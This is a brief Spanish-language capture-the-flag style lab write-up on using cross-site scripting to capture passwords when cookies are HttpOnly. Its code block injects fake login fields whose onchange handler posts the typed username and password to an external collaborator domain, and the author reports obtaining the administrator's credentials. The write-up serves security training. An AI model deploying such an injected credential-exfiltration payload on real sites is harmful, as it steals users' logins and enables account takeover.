Exploiting cross-site scripting to capture passwords
![[20260330145706.png]](/assets/20260330145706.D9HDgfTP.png)
LAB
![[20260330150224.png]](/assets/20260330150224.C-h6Rce9.png)
En este laboratorio, vemos que tenemos valores true en HtppOnly y en Secure por lo que no podremos exfiltrar la cookie de usuario.
![[20260330150742.png]](/assets/20260330150742.qzZy9iDb.png)
Por ello podemos insertar un código html para que la victima pueda insertar sus credenciales y este sea enviada a nuestro dominio
c
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://5bhwpeybyz6swmzev5jjcl67kyqpek29.oastify.com',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">![[20260330150347.png]](/assets/20260330150347.B2Ug-can.png)
![[20260330150529.png]](/assets/20260330150529.DLLliQEG.png)
Al insertar y luego esperar un par de segundos veremos que tenemos efectivamente las credenciales del usuario administrator
![[20260330150609.png]](/assets/20260330150609.B2AZqziT.png)
![[20260330151028.png]](/assets/20260330151028.mDAxxtLd.png)